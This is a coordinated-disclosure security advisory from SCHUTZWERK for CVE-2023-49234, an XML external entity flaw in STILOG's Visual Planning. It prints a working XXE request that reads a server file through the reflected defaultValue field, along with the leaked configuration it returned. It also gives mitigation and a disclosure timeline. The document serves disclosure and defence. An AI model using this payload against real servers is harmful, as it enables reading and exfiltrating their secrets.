diamond_fulldiamonddiamond_halfdiamond_eurosearch-iconmenuchat-iconclose-iconenvelope-iconsmartphone-call-icon

Blog & News

28. März, 2024

#ADVISORIES

Advisory: Arbitrary File Read via XML External Entities in Visual Planning (CVE-2023-49234)

Release of SCHUTZWERK-SA-2023-006

preview-image for SCHUTZWERK-SA-2023-006
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Title
=====

SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in Visual Planning

Status
======

PUBLISHED

Version
=======

1.0

CVE reference
=============

CVE-2023-49234

Link
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/

Text-only version:
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt

Affected products/vendor
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary
=======

Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning[0] application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system.

Risk
====

An attacker can use the vulnerability to gather information and depending on the stored data, exfiltrate secrets from the file system. Furthermore, HTTP requests can be used for out-of-bands exfiltration and possibly server side request forgery (SSRF) attacks.

Description
===========

During a recent red teaming assessment, Visual Planning was identified as part of the customers internet-facing assets. The software is developed by STILOG I.S.T. and provides resource management and scheduling features. A security assessment conducted by SCHUTZWERK found an arbitrary file read vulnerability via XML external entities in Visual Planning.
The application Admin Center (vpadmin) communicates with the server through an XML-based protocol that utilizes proprietary compression methods and is transmitted via HTTP. SCHUTZWERK implemented a custom proxy as part of an assessment in order to intercept and manipulate the messages exchanged between application and server.

One of the messages sent by the Admin Center application after authentication is the following:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>

</defaultValue>
<propertyName>PWD</propertyName>
<rawResult>false</rawResult>
<section>INSTALLDATA</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The method GetApplicationProperty is called to request the value of the property PWD. The server responds with an XML message, where the value element contains the response of the query:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>

</value>
</com.visualplanning.query.result.ApplicationPropertyResult>

In this response it was observed that if the requested property value could not be resolved, the content of the request element defaultValue will be reflected as part of the response, making it a suitable back channel for XML external entity (XXE) injections.

The following message was sent to the Visual Planning application:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>&example;</defaultValue>
<propertyName>ShowBackground</propertyName>
<rawResult>false</rawResult>
<section>Application</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The server responds with the content of the requested install.properties file inside the value element, thus confirming the XML parser is vulnerable to XML external entity (XXE) injections:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>#
#Tue Oct 03 15:37:33 CEST 2023
INSTALLDATA.INSTALLSERIAL=
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning
INSTALLDATA.OK=Next
INSTALLDATA.PAGE=PROVIDER
INSTALLDATA.POOLMODE=1
INSTALLDATA.PORT=3306
INSTALLDATA.PROVIDERTYPE=MySQL
INSTALLDATA.PWD=ENCODE\:
INSTALLDATA.SERVER=127.0.0.1
INSTALLDATA.SERVERLANG=de
INSTALLDATA.USER=root
INSTALLDATA.VIEWERSERIAL=
</value>
</com.visualplanning.query.result.ApplicationPropertyResult>

Further testing showed that out-of-bands exfiltration via HTTPS requests is also generally possible.

Solution/Mitigation
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline
===================

2023-11-01: Vulnerability discovered
2023-11-09: Contact vendor in order to determine security contact
2023-11-10: Received generic sales response from vendor
2023-11-14: Contacted CTO of vendor directly
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor
2023-11-24: CVE assigned by Mitre
2023-11-24: Additional technical details provided to vendor
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings is in progress
2024-01-30: Inquired about mitigation status regarding the reported vulnerabilities
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were already fixed
2024-03-08: Sent advisory drafts to vendor
2024-03-28: Received patch information and release of advisory

Contact/Credits
===============

The vulnerability was discovered during an assessment by Lennert Preuth and David Brown of SCHUTZWERK GmbH.

References
==========

[0] https://www.visual-planning.com/en/

Disclaimer
==========

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found at SCHUTZWERK GmbH's website ( https://www.schutzwerk.com ).

Additional information
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6
S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM
ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm
ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO
sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21
YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN
UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9
YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d
TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/
1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML
ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz
mZ2yA2/9ZfQwOawEirQtQr8=
=TUGM
-----END PGP SIGNATURE-----

~ Lennert Preuth, David Brown

Kostenfreies Erstgespräch